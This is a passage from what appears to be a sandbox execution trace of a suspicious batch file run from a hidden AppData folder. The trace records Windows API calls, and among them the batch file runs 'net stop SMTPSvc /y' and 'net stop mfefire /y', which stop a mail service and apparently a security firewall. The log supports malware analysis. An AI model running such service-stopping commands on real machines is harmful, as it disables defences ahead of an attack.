(hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0197.625] SetConsoleInputExeNameW () returned 0x1 [0197.625] GetConsoleOutputCP () returned 0x1b5 [0197.625] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0197.625] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.625] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0197.625] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0197.625] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.625] SetFilePointer (in: hFile=0x74, lDistanceToMove=2579, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa13 [0197.625] GetProcessHeap () returned 0x3e0000 [0197.625] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0197.626] GetProcessHeap () returned 0x3e0000 [0197.626] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0197.626] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.626] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa13 [0197.626] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xeae, lpOverlapped=0x0) returned 1 [0197.626] SetFilePointer (in: hFile=0x74, lDistanceToMove=2600, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa28 [0197.626] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SMTPSvc /y\r\nnagementService /y\r\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 21 [0197.627] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.627] GetFileType (hFile=0x74) returned 0x1 [0197.627] _get_osfhandle (_FileHandle=3) returned 0x74 [0197.627] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa28 [0197.627] GetProcessHeap () returned 0x3e0000 [0197.627] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0197.627] GetProcessHeap () returned 0x3e0000 [0197.627] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0197.630] _tell (_FileHandle=3) returned 2600 [0197.630] _close (_FileHandle=3) returned 0 [0197.631] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0197.631] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0197.631] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0197.631] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0197.631] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0197.631] _wcsicmp (_String1="net", _String2="CD") returned 11 [0197.631] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0197.631] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0197.631] _wcsicmp (_String1="net", _String2="REN") returned -4 [0197.631] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0197.631] _wcsicmp (_String1="net", _String2="SET") returned -5 [0197.631] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0197.631] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0197.631] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0197.631] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0197.631] _wcsicmp (_String1="net", _String2="MD") returned 1 [0197.631] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0197.631] _wcsicmp (_String1="net", _String2="RD") returned -4 [0197.631] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0197.631] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0197.631] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0197.631] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0197.631] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0197.631] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0197.631] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0197.631] _wcsicmp (_String1="net", _String2="VER") returned -8 [0197.631] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0197.631] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0197.631] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0197.631] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0197.631] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0197.631] _wcsicmp (_String1="net", _String2="START") returned -5 [0197.631] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0197.631] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0197.631] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0197.631] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0197.631] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0197.632] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0197.632] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0197.632] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0197.632] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0197.632] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0197.632] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0197.632] SetErrorMode (uMode=0x0) returned 0x1 [0197.632] GetProcessHeap () returned 0x3e0000 [0197.632] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0197.632] GetProcessHeap () returned 0x3e0000 [0197.632] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0197.633] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.633] GetProcessHeap () returned 0x3e0000 [0197.633] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0197.633] GetProcessHeap () returned 0x3e0000 [0197.633] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0197.633] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.634] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.634] GetLastError () returned 0x2 [0197.634] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.634] GetLastError () returned 0x2 [0197.635] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.635] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.635] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.635] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0197.636] GetLastError () returned 0x2 [0197.636] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0197.636] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0197.636] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.637] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0197.637] SetErrorMode (uMode=0x0) returned 0x1 [0197.637] GetProcessHeap () returned 0x3e0000 [0197.637] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0197.637] GetProcessHeap () returned 0x3e0000 [0197.637] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0197.638] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.638] GetProcessHeap () returned 0x3e0000 [0197.638] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0197.638] GetProcessHeap () returned 0x3e0000 [0197.638] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0197.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.639] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.639] GetLastError () returned 0x2 [0197.639] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.639] GetLastError () returned 0x2 [0197.639] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.640] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0197.640] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0197.640] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0197.641] GetLastError () returned 0x2 [0197.641] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0197.641] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0197.641] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.642] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0197.642] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0197.642] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0197.642] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0197.642] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SMTPSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SMTPSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SMTPSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa30, dwThreadId=0xa34)) returned 1 [0197.646] CloseHandle (hObject=0x74) returned 1 [0197.646] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0197.646] GetProcessHeap () returned 0x3e0000 [0197.646] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.646] GetEnvironmentStringsW () returned 0x3f8408* [0197.646] GetProcessHeap () returned 0x3e0000 [0197.646] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.646] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.646] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0197.778] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0197.778] CloseHandle (hObject=0x78) returned 1 [0197.778] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0197.778] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0197.778] GetProcessHeap () returned 0x3e0000 [0197.778] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.778] GetEnvironmentStringsW () returned 0x3f8408* [0197.778] GetProcessHeap () returned 0x3e0000 [0197.778] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.778] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.778] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.778] GetProcessHeap () returned 0x3e0000 [0197.778] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0197.778] GetEnvironmentStringsW () returned 0x3f8408* [0197.778] GetProcessHeap () returned 0x3e0000 [0197.778] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0197.778] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0197.778] GetProcessHeap () returned 0x3e0000 [0197.778] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0197.778] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0197.779] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.779] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0197.779] _get_osfhandle (_FileHandle=1) returned 0x264 [0197.779] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0197.779] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.779] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0197.779] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0197.779] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0197.780] SetConsoleInputExeNameW () returned 0x1 [0197.780] GetConsoleOutputCP () returned 0x1b5 [0197.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0197.780] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0197.780] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0197.780] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.780] SetFilePointer (in: hFile=0x78, lDistanceToMove=2600, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa28 [0197.780] GetProcessHeap () returned 0x3e0000 [0197.780] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0197.780] GetProcessHeap () returned 0x3e0000 [0197.780] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0197.780] GetProcessHeap () returned 0x3e0000 [0197.780] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0197.780] GetProcessHeap () returned 0x3e0000 [0197.780] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0197.780] GetProcessHeap () returned 0x3e0000 [0197.780] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0197.780] GetProcessHeap () returned 0x3e0000 [0197.780] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0197.780] GetProcessHeap () returned 0x3e0000 [0197.780] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0197.780] GetProcessHeap () returned 0x3e0000 [0197.780] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0197.781] GetProcessHeap () returned 0x3e0000 [0197.781] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0197.781] GetProcessHeap () returned 0x3e0000 [0197.781] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0197.781] GetProcessHeap () returned 0x3e0000 [0197.781] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0197.781] GetProcessHeap () returned 0x3e0000 [0197.781] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0197.781] GetProcessHeap () returned 0x3e0000 [0197.781] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0197.781] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.781] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa28 [0197.781] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xe99, lpOverlapped=0x0) returned 1 [0197.781] SetFilePointer (in: hFile=0x78, lDistanceToMove=2621, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa3d [0197.781] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop mfefire /y\r\nnagementService /y\r\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 21 [0197.782] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.782] GetFileType (hFile=0x78) returned 0x1 [0197.782] _get_osfhandle (_FileHandle=3) returned 0x78 [0197.782] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa3d [0197.782] GetProcessHeap () returned 0x3e0000 [0197.782] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0197.782] GetProcessHeap () returned 0x3e0000 [0197.782] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0197.785] _tell (_FileHandle=3) returned 2621 [0197.785] _close (_FileHandle=3) returned 0 [0197.785] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0197.785] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0197.785] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0197.785] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0197.785] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0197.785] _wcsicmp (_String1="net", _String2="CD") returned 11 [0197.785] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0197.785] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0197.785] _wcsicmp (_String1="net", _String2="REN") returned -4 [0197.785] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0197.785] _wcsicmp (_String1="net", _String2="SET") returned -5 [0197.786] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0197.786] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0197.786] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0197.786] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0197.786] _wcsicmp (_String1="net", _String2="MD") returned 1 [0197.786] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0197.786] _wcsicmp (_String1="net", _String2="RD") returned -4 [0197.786] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0197.786] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0197.786] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0197.786] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0197.786] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0197.786] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0197.786] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0197.786] _wcsicmp (_String1="net", _String2="VER") returned -8 [0197.786] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0197.786] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0197.786] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0197.786] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0197.786] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0197.786] _wcsicmp (_String1="net", _String2="START") returned -5 [0197.786] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0197.786] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0197.786] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0197.786] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0197.786] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0197.786] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0197.786] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0197.786] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0197.786] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0197.786] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0197.787] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0197.787] SetErrorMode (uMode=0x0) returned 0x1 [0197.787] GetProcessHeap () returned 0x3e0000 [0197.787] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0197.787] GetProcessHeap () returned 0x3e0000 [0197.787] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0197.787] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.788] GetProcessHeap () returned 0x3e0000 [0197.788] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0197.788] GetProcessHeap () returned 0x3e0000 [0197.788] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0197.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.788] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 